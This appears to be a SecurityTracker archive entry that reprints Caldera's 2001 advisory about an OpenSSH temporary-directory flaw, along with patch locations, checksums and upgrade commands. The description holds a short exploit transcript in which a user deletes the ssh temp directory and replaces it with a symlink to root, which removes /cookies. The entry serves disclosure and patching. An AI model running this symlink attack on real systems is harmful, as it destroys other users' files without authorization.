SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Security)  >   OpenSSH Vendors:   OpenSSH.org
(Caldera Issues Fix) OpenSSH Allows Authorized Users to Delete Other User Files Named Cookies
SecurityTracker Alert ID:  1001920
SecurityTracker URL:  http://securitytracker.com/id/1001920
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jul 4 2001
Impact:   Denial of service via local system, Modification of system information
Fix Available:  Yes  Vendor Confirmed:  Yes  
Version(s): openssh-server-2.5.2p2-1.7.2
Description:   A vulnerability has been reported in OpenSSH that allows an authorized user to delete any file on the file system if the file is named "cookies".

A transcript of an exploit scenario is provided below:

[root@clarity /root]# touch /cookies;ls /cookies
/cookies
[root@clarity /root]# ssh zen@localhost
zen@localhost's password:
Last login: Mon Jun 4 20:22:39 2001 from localhost.local
Linux clarity 2.2.19-7.0.1 #1 Tue Apr 10 01:56:16 EDT 2001 i686 unknown
[zen@clarity zen]$ rm -r /tmp/ssh-XXW9hNY9/; ln -s / /tmp/ssh-XXW9hNY9
[zen@clarity zen]$ logout
Connection to localhost closed.
[root@clarity /root]# ls /cookies
/bin/ls: /cookies: No such file or directory

The OpenSSH vendor (www.openssh.org) has reportedly created a patch to address this issue.

Impact:   A local user can delete files named "cookies" in certain directories on the file system.
Solution:   The vendor has released a fix. See the Source Message for the vendor's advisory containing directions on how to obtain the appropriate fix.
Vendor URL:  www.openssh.org/ (Links to External Site)
Cause:   Access control error
Underlying OS:  Linux (Caldera/SCO)

Message History:   This archive entry is a follow-up to the message listed below.
Jun 5 2001 OpenSSH Allows Authorized Users to Delete Other User Files Named Cookies



 Source Message Contents

Subject:  Security Update: [CSSA-2001-023.0] Linux - openssh cookie file problem


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

______________________________________________________________________________
		   Caldera International, Inc.  Security Advisory

Subject:		Linux - openssh cookie file problem
Advisory number: 	CSSA-2001-023.0
Issue date: 		2001 July, 03
Cross reference:        
______________________________________________________________________________


1. Problem Description

   Due to unsafe temporary directory usage an local attacker
   could remove any file called 'cookies' on the system.

2. Vulnerable Versions

   System                       Package
   -----------------------------------------------------------
   OpenLinux 2.3		not vulnerable

   OpenLinux eServer 2.3.1      All packages previous to
   and OpenLinux eBuilder  	openssh-2.9p2-3

   OpenLinux eDesktop 2.4       not vulnerable

   OpenLinux 3.1 Server		All packages previous to
				openssh-2.9p2-3	

   OpenLinux 3.1 Workstation    All packages previous to
				openssh-2.9p2-3

3. Solution

   Workaround

      none

   The proper solution is to upgrade to the latest packages.

4. OpenLinux 2.3

       not vulnerable

5. OpenLinux eServer 2.3.1 and OpenLinux eBuilder for ECential 3.0

   5.1 Location of Fixed Packages

       The upgrade packages can be found on Caldera's FTP site at:

       ftp://ftp.caldera.com/pub/updates/eServer/2.3/current/RPMS/

       The corresponding source code package can be found at:

       ftp://ftp.caldera.com/pub/updates/eServer/2.3/current/SRPMS

   5.2 Verification

       34fbb2815f03c432492720d28f0db39d  RPMS/openssh-2.9p2-3.i386.rpm
       ee99b7b586166416601b4a0d4f90164d  RPMS/openssh-askpass-2.9p2-3.i386.rpm
       66c4ccbc757c7fc3f0d9edd50ce4444b  RPMS/openssh-server-2.9p2-3.i386.rpm
       f07dbad19313f6ae41329115ceda1bf4  SRPMS/openssh-2.9p2-3.src.rpm

   5.3 Installing Fixed Packages

       Upgrade the affected packages with the following commands:

	  /etc/rc.d/init.d/sshd stop
          rpm -Fvh openssh*.i386.rpm
	  /etc/rc.d/init.d/sshd start

6. OpenLinux eDesktop 2.4

       not vulnerable

7. OpenLinux 3.1 Server

   7.1 Location of Fixed Packages

   The upgrade packages can be found on Caldera's FTP site at:

   ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Server/current/RPMS/

   The corresponding source code package can be found at:

   ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Server/current/SRPMS

   7.2 Verification

       af280d6cc5b6fb7d9f9be1511bd4aa40  RPMS/openssh-2.9p2-3.i386.rpm
       346dfd71190bbbe59d4ae0bc2f582011  RPMS/openssh-askpass-2.9p2-3.i386.rpm
       6fadeb3261714e130ccd0d69d40871a1  RPMS/openssh-server-2.9p2-3.i386.rpm
       f07dbad19313f6ae41329115ceda1bf4  SRPMS/openssh-2.9p2-3.src.rpm

   7.3 Installing Fixed Packages

       Upgrade the affected packages with the following commands:

           rpm -Fvh openssh*i386.rpm

       or start kcupdate, the Caldera OpenLinux Update Manager.

8. OpenLinux 3.1 Workstation

   8.1 Location of Fixed Packages

   The upgrade packages can be found on Caldera's FTP site at:

   ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Workstation/current/RPMS/

   The corresponding source code package can be found at:

   ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Workstation/current/SRPMS

   8.2 Verification

       af280d6cc5b6fb7d9f9be1511bd4aa40  RPMS/openssh-2.9p2-3.i386.rpm
       346dfd71190bbbe59d4ae0bc2f582011  RPMS/openssh-askpass-2.9p2-3.i386.rpm
       6fadeb3261714e130ccd0d69d40871a1  RPMS/openssh-server-2.9p2-3.i386.rpm
       f07dbad19313f6ae41329115ceda1bf4  SRPMS/openssh-2.9p2-3.src.rpm

   8.3 Installing Fixed Packages

       Upgrade the affected packages with the following commands:

           rpm -Fvh openssh*i386.rpm

       or start kcupdate, the Caldera OpenLinux Update Manager.

9. References

   This and other Caldera security resources are located at:

   http://www.caldera.com/support/security/index.html

   This security fix closes Caldera's internal Problem Reports 10114 and
   10157.

10.Disclaimer

   Caldera International, Inc. is not responsible for the misuse of
   any of the information we provide on this website and/or through our
   security advisories. Our advisories are a service to our customers
   intended to promote secure installation and use of Caldera OpenLinux.

11.Acknowledgements

   Caldera International wishes to thank zen-parse for reporting this
   problem and the OpenSSH folks for providing a timely fix.
______________________________________________________________________________
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE7Qcmw18sy83A/qfwRAitUAJ48NSL6X6fpVr9hXXv8tAJ21EXCbgCgpcLt
D6Cqe0VDor5g/SiY8ZDYsT8=
=4ZXh
-----END PGP SIGNATURE-----

---------------------------------------------------------------------
To unsubscribe, e-mail: announce-unsubscribe@lists.caldera.com
For additional commands, e-mail: announce-help@lists.caldera.com


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2022, SecurityGlobal.net LLC